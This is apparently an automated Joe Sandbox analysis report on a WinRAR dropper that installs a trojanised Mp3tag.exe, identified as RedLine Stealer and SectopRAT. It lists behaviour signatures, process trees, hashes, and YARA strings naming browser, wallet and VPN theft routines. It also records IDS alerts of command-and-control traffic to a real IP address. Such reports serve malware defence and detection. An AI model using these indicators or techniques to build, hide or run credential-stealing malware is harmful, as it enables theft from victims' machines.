Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560988
MD5:bfc5ea31b4aeefec1508e8f5b458e574
SHA1:976fe53a467068719f70a856dca3bb7b65a9d6dc
SHA256:44997a5aa2709c2cef26ea501d4f01140d34b59f0fd182282354598eef4b224b
Tags:exeuser-Bitsight
Infos:

Detection

RedLine, SectopRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
Yara detected SectopRAT
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BFC5EA31B4AEEFEC1508E8F5B458E574)
    • Mp3tag.exe (PID: 7744 cmdline: "C:\Users\user~1\AppData\Local\Temp\Bijouterie\Mp3tag.exe" MD5: A7118DFFEAC3772076F1A39A364D608D)
      • Mp3tag.exe (PID: 7872 cmdline: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe MD5: A7118DFFEAC3772076F1A39A364D608D)
        • cmd.exe (PID: 8000 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • MSBuild.exe (PID: 1456 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • Mp3tag.exe (PID: 1476 cmdline: "C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe" MD5: A7118DFFEAC3772076F1A39A364D608D)
    • cmd.exe (PID: 2868 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 1912 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\umfcpwvoouwjqJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\umfcpwvoouwjqJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      C:\Users\user\AppData\Local\Temp\umfcpwvoouwjqMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
      • 0xb864a:$s14: keybd_event
      • 0xbf3b9:$v1_1: grabber@
      • 0xb921c:$v1_2: <BrowserProfile>k__
      • 0xb9c95:$v1_3: <SystemHardwares>k__
      • 0xb9d54:$v1_5: <ScannedWallets>k__
      • 0xb9de4:$v1_6: <DicrFiles>k__
      • 0xb9dc0:$v1_7: <MessageClientFiles>k__
      • 0xba18a:$v1_8: <ScanBrowsers>k__BackingField
      • 0xba1dc:$v1_8: <ScanWallets>k__BackingField
      • 0xba1f9:$v1_8: <ScanScreen>k__BackingField
      • 0xba233:$v1_8: <ScanVPN>k__BackingField
      • 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
      • 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
      C:\Users\user\AppData\Local\Temp\lcqqpedjyaavJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        C:\Users\user\AppData\Local\Temp\lcqqpedjyaavJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000B.00000002.1779706990.0000000005440000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.1779706990.0000000005440000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0000000E.00000002.2522571454.00000000006A7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000010.00000002.2056182127.0000000005800000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000010.00000002.2056182127.0000000005800000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 11 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    16.2.cmd.exe.58000c8.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      16.2.cmd.exe.58000c8.7.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        16.2.cmd.exe.58000c8.7.unpackMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
                        • 0xb684a:$s14: keybd_event
                        • 0xbd5b9:$v1_1: grabber@
                        • 0xb741c:$v1_2: <BrowserProfile>k__
                        • 0xb7e95:$v1_3: <SystemHardwares>k__
                        • 0xb7f54:$v1_5: <ScannedWallets>k__
                        • 0xb7fe4:$v1_6: <DicrFiles>k__
                        • 0xb7fc0:$v1_7: <MessageClientFiles>k__
                        • 0xb838a:$v1_8: <ScanBrowsers>k__BackingField
                        • 0xb83dc:$v1_8: <ScanWallets>k__BackingField
                        • 0xb83f9:$v1_8: <ScanScreen>k__BackingField
                        • 0xb8433:$v1_8: <ScanVPN>k__BackingField
                        • 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
                        • 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
                        20.2.MSBuild.exe.1300000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          20.2.MSBuild.exe.1300000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            Click to see the 10 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Use Short Name Path in Command Line
                            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Bijouterie\Mp3tag.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Bijouterie\Mp3tag.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7632, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Bijouterie\Mp3tag.exe" , ProcessId: 7744, ProcessName: Mp3tag.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-22T15:48:56.235365+010020292171Malware Command and Control Activity Detected45.141.87.5515647192.168.2.749787TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-22T15:48:55.028845+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:55.149849+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:55.270513+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:55.393236+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:55.519366+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:55.639489+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:55.761608+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:56.014151+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:56.507416+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:56.634022+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:56.753686+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            2024-11-22T15:48:56.875166+010020519101A Network Trojan was detected192.168.2.74978745.141.87.5515647TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-22T15:48:59.793051+010020522481A Network Trojan was detected192.168.2.74979445.141.87.559000TCP
                            2024-11-22T15:49:01.398709+010020522481A Network Trojan was detected192.168.2.74979945.141.87.559000TCP
                            2024-11-22T15:49:02.940246+010020522481A Network Trojan was detected192.168.2.74980345.141.87.559000TCP
                            2024-11-22T15:49:04.533263+010020522481A Network Trojan was detected192.168.2.74980645.141.87.559000TCP
                            2024-11-22T15:49:06.132047+010020522481A Network Trojan was detected192.168.2.74981145.141.87.559000TCP
                            2024-11-22T15:49:07.772243+010020522481A Network Trojan was detected192.168.2.74981745.141.87.559000TCP
                            2024-11-22T15:49:09.429630+010020522481A Network Trojan was detected192.168.2.74982145.141.87.559000TCP
                            2024-11-22T15:49:11.069587+010020522481A Network Trojan was detected192.168.2.74982645.141.87.559000TCP
                            2024-11-22T15:49:12.740188+010020522481A Network Trojan was detected192.168.2.74983145.141.87.559000TCP
                            2024-11-22T15:49:14.340978+010020522481A Network Trojan was detected192.168.2.74983745.141.87.559000TCP
                            2024-11-22T15:49:15.972653+010020522481A Network Trojan was detected192.168.2.74984045.141.87.559000TCP
                            2024-11-22T15:49:17.584812+010020522481A Network Trojan was detected192.168.2.74984545.141.87.559000TCP
                            2024-11-22T15:49:19.223340+010020522481A Network Trojan was detected192.168.2.74984945.141.87.559000TCP
                            2024-11-22T15:49:20.864131+010020522481A Network Trojan was detected192.168.2.74985345.141.87.559000TCP
                            2024-11-22T15:49:22.458985+010020522481A Network Trojan was detected192.168.2.74985845.141.87.559000TCP
                            2024-11-22T15:49:24.076788+010020522481A Network Trojan was detected192.168.2.74986345.141.87.559000TCP
                            2024-11-22T15:49:25.680946+010020522481A Network Trojan was detected192.168.2.74986645.141.87.559000TCP
                            2024-11-22T15:49:27.245126+010020522481A Network Trojan was detected192.168.2.74987245.141.87.559000TCP
                            2024-11-22T15:49:28.852096+010020522481A Network Trojan was detected192.168.2.74987645.141.87.559000TCP
                            2024-11-22T15:49:30.414881+010020522481A Network Trojan was detected192.168.2.74988145.141.87.559000TCP
                            2024-11-22T15:49:32.062161+010020522481A Network Trojan was detected192.168.2.74988545.141.87.559000TCP
                            2024-11-22T15:49:33.777983+010020522481A Network Trojan was detected192.168.2.74988945.141.87.559000TCP
                            2024-11-22T15:49:35.313567+010020522481A Network Trojan was detected192.168.2.74989545.141.87.559000TCP
                            2024-11-22T15:49:36.953241+010020522481A Network Trojan was detected192.168.2.74989845.141.87.559000TCP
                            2024-11-22T15:49:38.563149+010020522481A Network Trojan was detected192.168.2.74990445.141.87.559000TCP
                            2024-11-22T15:49:40.174983+010020522481A Network Trojan was detected192.168.2.74990845.141.87.559000TCP
                            2024-11-22T15:49:41.818734+010020522481A Network Trojan was detected192.168.2.74991345.141.87.559000TCP
                            2024-11-22T15:49:43.448372+010020522481A Network Trojan was detected192.168.2.74991745.141.87.559000TCP
                            2024-11-22T15:49:45.086492+010020522481A Network Trojan was detected192.168.2.74992145.141.87.559000TCP
                            2024-11-22T15:49:46.696040+010020522481A Network Trojan was detected192.168.2.74992745.141.87.559000TCP
                            2024-11-22T15:49:48.304464+010020522481A Network Trojan was detected192.168.2.74993045.141.87.559000TCP
                            2024-11-22T15:49:49.894471+010020522481A Network Trojan was detected192.168.2.74993545.141.87.559000TCP
                            2024-11-22T15:49:51.536359+010020522481A Network Trojan was detected192.168.2.74993945.141.87.559000TCP
                            2024-11-22T15:49:53.080415+010020522481A Network Trojan was detected192.168.2.74994345.141.87.559000TCP
                            2024-11-22T15:49:54.669967+010020522481A Network Trojan was detected192.168.2.74994845.141.87.559000TCP
                            2024-11-22T15:49:56.222177+010020522481A Network Trojan was detected192.168.2.74995245.141.87.559000TCP
                            2024-11-22T15:49:57.821543+010020522481A Network Trojan was detected192.168.2.74995745.141.87.559000TCP
                            2024-11-22T15:49:59.405844+010020522481A Network Trojan was detected192.168.2.74996245.141.87.559000TCP
                            2024-11-22T15:50:00.955506+010020522481A Network Trojan was detected192.168.2.74996645.141.87.559000TCP
                            2024-11-22T15:50:02.576990+010020522481A Network Trojan was detected192.168.2.74997145.141.87.559000TCP
                            2024-11-22T15:50:04.120003+010020522481A Network Trojan was detected192.168.2.74997545.141.87.559000TCP
                            2024-11-22T15:50:05.729162+010020522481A Network Trojan was detected192.168.2.74997945.141.87.559000TCP
                            2024-11-22T15:50:07.534622+010020522481A Network Trojan was detected192.168.2.74998345.141.87.559000TCP
                            2024-11-22T15:50:09.193303+010020522481A Network Trojan was detected192.168.2.74998945.141.87.559000TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-22T15:49:02.940246+010028033053Unknown Traffic192.168.2.74980345.141.87.559000TCP
                            2024-11-22T15:49:06.132047+010028033053Unknown Traffic192.168.2.74981145.141.87.559000TCP
                            2024-11-22T15:49:07.772243+010028033053Unknown Traffic192.168.2.74981745.141.87.559000TCP
                            2024-11-22T15:49:09.429630+010028033053Unknown Traffic192.168.2.74982145.141.87.559000TCP
                            2024-11-22T15:49:12.740188+010028033053Unknown Traffic192.168.2.74983145.141.87.559000TCP
                            2024-11-22T15:49:14.340978+010028033053Unknown Traffic192.168.2.74983745.141.87.559000TCP
                            2024-11-22T15:49:15.972653+010028033053Unknown Traffic192.168.2.74984045.141.87.559000TCP
                            2024-11-22T15:49:17.584812+010028033053Unknown Traffic192.168.2.74984545.141.87.559000TCP
                            2024-11-22T15:49:36.953241+010028033053Unknown Traffic192.168.2.74989845.141.87.559000TCP
                            2024-11-22T15:49:40.174983+010028033053Unknown Traffic192.168.2.74990845.141.87.559000TCP
                            2024-11-22T15:49:43.448372+010028033053Unknown Traffic192.168.2.74991745.141.87.559000TCP
                            2024-11-22T15:49:46.696040+010028033053Unknown Traffic192.168.2.74992745.141.87.559000TCP
                            2024-11-22T15:49:49.894471+010028033053Unknown Traffic192.168.2.74993545.141.87.559000TCP
                            2024-11-22T15:49:51.536359+010028033053Unknown Traffic192.168.2.74993945.141.87.559000TCP
                            2024-11-22T15:49:56.222177+010028033053Unknown Traffic192.168.2.74995245.141.87.559000TCP
                            2024-11-22T15:50:00.955506+010028033053Unknown Traffic192.168.2.74996645.141.87.559000TCP
                            2024-11-22T15:50:04.120003+010028033053Unknown Traffic192.168.2.74997545.141.87.559000TCP
                            2024-11-22T15:50:05.729162+010028033053Unknown Traffic192.168.2.74997945.141.87.559000TCP
                            2024-11-22T15:50:07.534622+010028033053Unknown Traffic192.168.2.74998345.141.87.559000TCP
                            2024-11-22T15:50:09.193303+010028033053Unknown Traffic192.168.2.74998945.141.87.559000TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjqAvira: detection malicious, Label: TR/Agent.edjbt
                            Source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaavAvira: detection malicious, Label: TR/Agent.edjbt
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjqJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaavJoe Sandbox ML: detected
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066EA368 CryptUnprotectData,14_2_066EA368
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066EAB7B CryptUnprotectData,14_2_066EAB7B
                            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49699 version: TLS 1.2
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: pbBuf != NULLlnLength != 0SZipFile::AppendCentralDirFileHeaderpOut != NULLY:\projects\_main\SZipFile.cppSZipFile::AllocateNewDataBlockastrInFilePaths[i]astrInFilePaths.size() != 0_S_FALSE(m_zf.bZipFileOpen)strOutFilePathSZipFile::CompressFilesAbspbCopyTo != NULLpdb->pdbNext != NULLrcdc.pdbFirst != NULL && rcdc.pdbLast != NULLSZipFile::DeleteDataBlocksdwLength <= 4readastrInFileNames[i]astrInFileNames.size() != 0SZipFile::CompressFilesRelpfileIn != NULLrb_S_FALSE(m_zf.bSubFileOpen)_S_TRUE(m_zf.bZipFileOpen)strGlobalCommentSZipFile::ZipCloseSZipFile::SZipFilehFind != INVALID_HANDLE_VALUE_S_FALSE(strFilePath.IsEmpty())SZipFile::GetFileTimem_zf.sfi.dwLocalFileHeaderPos != _S_NUM_MAXDWORDlpszFilePathlpszCommentSZipFile::ZipCreateSubFiledwOldPos != _S_NUM_MAXDWORD_S_TRUE(m_zf.bSubFileOpen)SZipFile::ZipCloseSubFiledwPosCentralDir != _S_NUM_MAXDWORDSZipFile::ZipWriteSubFilem_zf.dwStartPos != _S_NUM_MAXDWORDwbSZipFile::ZipOpen1.3.1m_zf.sfi.pbCentralDirFileHeader != NULLSDocument8 source: Mp3tag.exe
                            Source: Binary string: rcdc.pdbFirst != NULL && rcdc.pdbLast != NULL source: Mp3tag.exe
                            Source: Binary string: Y:\build\binaries\mp3tag\Mp3tag64.pdb source: Mp3tag.exe
                            Source: Binary string: ntdll.pdb source: Mp3tag.exe, 00000007.00000002.1384357397.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000007.00000002.1384655119.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1515559005.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1516217493.0000000003374000.00000004.00000001.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1514986366.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1822098294.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821488340.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1822379976.00000000033E9000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 0000000B.00000002.1779165142.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1778939346.0000000004685000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055918179.0000000005310000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055438521.0000000004E35000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ntdll.pdbUGP source: Mp3tag.exe, 00000007.00000002.1384357397.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000007.00000002.1384655119.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1515559005.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1516217493.0000000003374000.00000004.00000001.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1514986366.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1822098294.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821488340.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1822379976.00000000033E9000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: cmd.exe, 0000000B.00000002.1779165142.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1778939346.0000000004685000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055918179.0000000005310000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055438521.0000000004E35000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: Y:\build\binaries\mp3tag\Mp3tag64.pdb? source: Mp3tag.exe
                            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: file.exe
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C3984 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_00007FF7390C3984
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D62F0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,5_2_00007FF7390D62F0
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390E6DC0 FindFirstFileExA,5_2_00007FF7390E6DC0
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: 7_2_0081C510 FindFirstFileW,FindClose,7_2_0081C510
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: 7_2_00812940 FindFirstFileW,FindFirstFileW,7_2_00812940
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: 7_2_0081BD50 FindFirstFileW,FindClose,lstrlenW,7_2_0081BD50
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 9_2_004DC510 FindFirstFileW,FindClose,9_2_004DC510
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 9_2_004DBD50 FindFirstFileW,FindClose,lstrlenW,9_2_004DBD50
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 9_2_004D2940 FindFirstFileW,FindFirstFileW,9_2_004D2940
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0669C6F9h14_2_0669C5D8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0669C6F9h14_2_0669C708
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0669C6F9h14_2_0669C5C8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [ebp-28h]14_2_068581C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06B1410Bh14_2_06B13AE5
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 06B1410Bh14_2_06B140E7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 072C3FCCh14_2_072C2FF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 072C3FCCh14_2_072C2FF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0742E419h14_2_0742D768
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]14_2_0742D768
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0742EA6Eh14_2_0742D768
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0742C5F1h14_2_0742C5D9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 07421D94h14_2_074218FE

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49817 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49803 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.7:49787 -> 45.141.87.55:15647
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49794 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49845 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49806 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49840 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49849 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49858 -> 45.141.87.55:9000
